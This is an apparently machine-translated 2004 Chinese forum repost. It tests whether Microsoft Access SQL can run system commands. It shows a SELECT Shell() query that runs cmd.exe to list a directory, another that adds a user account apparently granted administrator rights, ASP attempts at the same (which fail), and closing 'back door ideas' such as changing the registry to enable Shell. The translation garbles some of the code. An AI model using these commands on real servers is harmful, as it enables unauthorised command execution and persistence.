2. Tech
  3. Some tests of Access

Some tests of Access

xiaoxiao2021-03-06  119

Some tests of Access

Text / superhei 2004-7-25

1. SHELL test;

Let's take a direct SQL in AccessL:

Statement: SELECT Shell ('C: /Winnt/System32/cmd.exe / C DIR C: /> C: 3456.txt');

"Run" results:

C: /> DIR 123456.txt

The volume in the drive C does not have a label.

The serial number of the volume is 3CEE-A8A9

C: / directory

2004-01-09 22:29 1,718 123456.txt

1 file 1,718 bytes

0 catalog 1,224,527,872 available bytes

C: /> Type 123456.txt

The volume in the drive C does not have a label.

The serial number of the volume is 3CEE-A8A9

C: / directory

2004-01-07 15:35 44 1.txt

2004-07-15 05:15 49 11.txt

2004-01-09 22:29 0 123456.txt

2004-07-31 15:50 478 333.txt

.................................................. ..

Figure:

Successfully executed, let's take a look

The statement is changed to:

Select shell ('c: /winnt/system32/cmd.exe / c net user aa AA / add');

After running:

C: /> Net User

/ Kak-e8uhoqq9m6s user account

----------------------------------------------

Aa administrator

IUSR_KAK-E8UHOQQ9M6S IWAM_KAK-E8UHOQQ9M6S

The command successfully completed.

It seems that the permissions are relatively large (but maybe inherited the permission of the user who run Access, I use the administrator privilege to run, no test for Guests)

Below we test the SP execution, first write an ASP yourself, the code is as follows:

<%

Set conn = server.createObject ("adoDb.connection")

DSN = "provider = microsoft.jet.Oledb.4.0; data source =" & server.mappath ("q.mdb")

SET RS = Server.createObject ("AdoDb.Recordset")

Conn.open DSN

SQL = "SELECT shell ('c: /winnt/system32/cmd.exe / c dir c: /> d: /sss1.txt')"

RS.Open SQL, CONN

IF f.eof and lys.bof?

'Access Denied

Else

'Access Allowed

END IF

Rs.close

SET RS = Nothing

'Close connection

Conn.close

Set conn = Nothing

Response.write "SQL is:" & SQL

%>

Run this ASP, the return result is as follows:

Microsoft VBScript compiler error error '800A03F6'

Lack of 'end'

/iishelp/common/500-100.asp, line 242

Microsoft Jet Database Engine Errors '80040E14' Expression 'Shell' Function is undefined.

/ Test/LSe/connections/kao6.asp, line 7

Tip "The 'Shell' Function is undefined", the test failed, I put the ASP code in the ASP code.

DSN = "provider = microsoft.jet.Oledb.4.0; data source =" & server.mappath ("q.mdb")

Change to DSN = "provider = microsoft.jet.Oledb.3.5; data source =" & Server.mappath ("q.mdb")

Run IE Returns:

Microsoft VBScript compiler error error '800A03F6'

Lack of 'end'

/iishelp/common/500-100.asp, line 242

Adodb.connection error '800A0E7A'

Provider Cannot Be Found. It May Not Be PROPERLY Installed.

/ Test/LSe/connections/kao8.asp, line 5

The provider has no installation without testing.

2. About the branches test

Here you use MSYSOBJECS: We newly established a query, the statement is as follows:

Select msysObjects.datecreate, msysObjects.dateupdate, sysobjects.name, ysObjects.type rom msysobjects;

MsysObjects.Datecreate gets the establishment time

MsysObjects.DateUpdate update time

MSYSObjects.name database name

MSYSObjects.Type database type

We do the above statements, get the results directly:

We put them in the ASP:

<%

Set conn = server.createObject ("adoDb.connection")

DSN = "provider = microsoft.jet.Oledb.4.0; data source =" & server.mappath ("q.mdb")

SET RS = Server.createObject ("AdoDb.Recordset")

Conn.open DSN

SQL = "SELECT MSYSObjects.datecreate, MsysObjects.dateUpdate, MsysObjects.Name, MsysObjects.type from msysobjects;"

RS.Open SQL, CONN

IF f.eof and lys.bof?

'Access Denied

Else

'Access Allowed

END IF

Rs.close

SET RS = Nothing

'Close connection

Conn.close

Set conn = Nothing

Response.write "SQL is:" & SQL

%>

IE returns:

Microsoft VBScript compiler error error '800A03F6'

Lack of 'end'

/iishelp/common/500-100.asp, line 242

Microsoft Jet Database Engine Errors '80040E09' cannot read records; no data permissions are read on 'msysObjects'.

/ Test/LSe/connections/kao7.asp, line 7

Photo:

Tips You cannot read the record; do not read data privileges on 'msysObjects'. No way, this approach is dying.

3. Supplement:

In IIS5 (Microsoft.jet.Oledb.4.0) We can't do the shell directly (it is said to be in the era of IIS4), it is not possible in Jet.OleDb.4.0 default, but can be set, we can Implement by changing registry, etc., do not know.

Back door ideas:

1, it is the above change registry, let Jet.OleDb.4.0 support shell so we can use directly in the ASP.

2. We use the SELECT shell () to execute the system command with the SELECT shell () through other programs.

转载请注明原文地址:https://www.9cbs.com/read-102141.html

9cbs

New Post(0)